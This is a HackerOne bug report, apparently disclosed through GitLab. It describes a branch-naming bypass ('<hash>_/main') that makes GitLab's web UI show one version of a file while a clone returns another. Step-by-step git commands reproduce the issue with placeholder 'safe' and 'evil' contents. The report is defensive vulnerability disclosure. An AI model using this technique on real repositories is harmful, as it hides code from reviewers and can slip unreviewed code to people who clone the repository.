Manipulate the repository content in the UI (bypass #2031845)
HackerOne report #2173053 by shells3c
on 2023-09-20, assigned to GitLab Team
:
Report
Summary
In order to fix #2031845, Gitlab added another check in prohibited_branch_checks
method to prevent any branch name that matches <hex>-/
. However, the _
character also works and hasn't been protected yet.
Steps to reproduce
- Create a new empty project on Gitlab
- Clone the project and create a safe repository for UI display:
mkdir -p ./_/main
echo "safe" > ./_/main/script.sh
git add -A
git commit -m .
git push origin
- Create a malicious branch with the malicious code:
git checkout --orphan "$(git rev-parse HEAD)_/main"
git rm -rf .
echo "evil" > script.sh
git add -A
git commit -m .
git push origin
- Go to your repository settings and set your default branch to the new branch
Now visit the project from Gitlab and view the content of script.sh
, you will see safe
, but if you clone it, the file will contain evil
.
Output of checks
This bug happens on GitLab.com
Impact
Similar to #1864278 (you can read it here if you can't access the HackerOne report), the repository you see from the UI is different than the repository you clone. You can see the video in the original report to understand it better.
How To Reproduce
Please add reproducibility information to this section: